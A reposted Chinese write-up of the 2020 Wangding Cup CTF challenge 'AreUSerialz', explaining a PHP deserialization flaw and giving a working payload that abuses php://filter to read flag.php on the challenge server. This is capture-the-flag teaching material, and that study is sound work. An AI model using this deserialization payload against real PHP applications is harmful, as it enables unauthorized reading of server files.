碼上歡樂
相關內容    簡體    繁體

[網鼎杯 2020 青龍組]AreUSerialz

本文轉載自   查看原文   2020-07-07 09:57   497    BUUCTF

代碼審計的題目,考點為反序列化漏洞

 1 <?php
 2 
 3 include("flag.php");
 4 
 5 highlight_file(__FILE__);
 6 
 7 class FileHandler {
 8 
 9     protected $op;
10     protected $filename;
11     protected $content;
12 
13     function __construct() {
14         $op = "1";
15         $filename = "/tmp/tmpfile";
16         $content = "Hello World!";
17         $this->process();
18     }
19 
20     public function process() {
21         if($this->op == "1") {
22             $this->write();
23         } else if($this->op == "2") {
24             $res = $this->read();
25             $this->output($res);
26         } else {
27             $this->output("Bad Hacker!");
28         }
29     }
30 
31     private function write() {
32         if(isset($this->filename) && isset($this->content)) {
33             if(strlen((string)$this->content) > 100) {
34                 $this->output("Too long!");
35                 die();
36             }
37             $res = file_put_contents($this->filename, $this->content);
38             if($res) $this->output("Successful!");
39             else $this->output("Failed!");
40         } else {
41             $this->output("Failed!");
42         }
43     }
44 
45     private function read() {
46         $res = "";
47         if(isset($this->filename)) {
48             $res = file_get_contents($this->filename);
49         }
50         return $res;
51     }
52 
53     private function output($s) {
54         echo "[Result]: <br>";
55         echo $s;
56     }
57 
58     function __destruct() {
59         if($this->op === "2")
60             $this->op = "1";
61         $this->content = "";
62         $this->process();
63     }
64 
65 }
66 
67 function is_valid($s) {
68     for($i = 0; $i < strlen($s); $i++)
69         if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
70             return false;
71     return true;
72 }
73 
74 if(isset($_GET{'str'})) {
75 
76     $str = (string)$_GET['str'];
77     if(is_valid($str)) {
78         $obj = unserialize($str);
79     }
80 
81 }

從74行代碼可以看出需要傳入str參數,然后通過is_valid()判斷str中的字符是否在ascii碼32到125之間,最后在對其進行反序列化

類在反序列化的過程中會調用__destruct方法

1 function __destruct() {
2     if($this->op === "2")
3     $this->op = "1";
4     $this->content = "";
5     $this->process();
6 }

代碼第2行中的op參數使用的是強類型比較,我們可以使用數字類型2進行繞過賦值op="1",然后賦值content參數為空,進入process方法

 1 public function process() {
 2    if($this->op == "1") {
 3          $this->write();
 4     } else if($this->op == "2") {
 5          $res = $this->read();
 6          $this->output($res);
 7          } else {
 8             $this->output("Bad Hacker!");
 9             }
10 }

代碼第2行op使用的弱類型比較,如果op值為1調用write(),op值為2調用read(),然后output()將read()返回值進行輸出

read()

1 private function read() {
2         $res = "";
3         if(isset($this->filename)) {
4             $res = file_get_contents($this->filename);
5         }
6         return $res;
7     }

filename沒有做過濾因此是可控的,所以我們可以通過php://filter偽協議,利用file_get_contents()讀取文件
需要注意的地方是,$op,$filename,$content三個變量權限都是protected,而protected權限的變量在序列化的時會有%00*%00字符,%00字符的ASCII碼為0,就無法通過上面的is_valid()校驗

 1 <?php
 2 include("flag.php");
 3 
 4 highlight_file(__FILE__);
 5 
 6 class FileHandler
 7 {
 8 
 9     protected $op = 2;
10     protected $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
11     protected $content;
12 
13     function __construct()
14     {
15         $op = "1";
16         $filename = "/tmp/tmpfile";
17         $content = "Hello World!";
18         $this->process();
19     }
20 
21     public function process()
22     {
23         if ($this->op == "1") {
24             $this->write();
25         } else if ($this->op == "2") {
26             $res = $this->read();
27             $this->output($res);
28         } else {
29             $this->output("Bad Hacker!");
30         }
31     }
32 
33     private function write()
34     {
35         if (isset($this->filename) && isset($this->content)) {
36             if (strlen((string)$this->content) > 100) {
37                 $this->output("Too long!");
38                 die();
39             }
40             $res = file_put_contents($this->filename, $this->content);
41             if ($res) $this->output("Successful!");
42             else $this->output("Failed!");
43         } else {
44             $this->output("Failed!");
45         }
46     }
47 
48     private function read()
49     {
50         $res = "";
51         if (isset($this->filename)) {
52             $res = file_get_contents($this->filename);
53         }
54         return $res;
55     }
56 
57     private function output($s)
58     {
59         echo "[Result]: <br>";
60         echo $s;
61     }
62 
63     function __destruct()
64     {
65         if ($this->op === "2")
66             $this->op = "1";
67         $this->content = "";
68         $this->process();
69     }
70 
71 }
72 echo serialize(new FileHandler());

序列化結果為如下圖,%00字符ascii碼為0,所以不顯示,變量前面會存在多出一個*

 

 有幾種繞過的方式,簡單的一種是:php7.1+版本對屬性類型不敏感,本地序列化的時候將屬性改為public便可繞過

 payLoad:

http://14971a13-49e6-413d-a220-0e27dc4c9363.node3.buuoj.cn/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;i:2;s:8:%22filename%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;s:7:%22content%22;N;}

base64解密后,便獲取到flag

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [網鼎杯 2020 青龍組]AreUSerialz [網鼎杯 2020 青龍組]AreUSerialz [網鼎杯 2020 青龍組]filejava [網鼎杯 2020 青龍組]jocker 網鼎杯2020 AreUSerialz 2020網鼎杯 青龍組reverse:signal 2020網鼎杯 青龍組reverse:joker 網鼎杯2020青龍組writeup-web 2020網鼎杯青龍組 MISC 虛幻2 網鼎杯青龍組2020部分題解
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM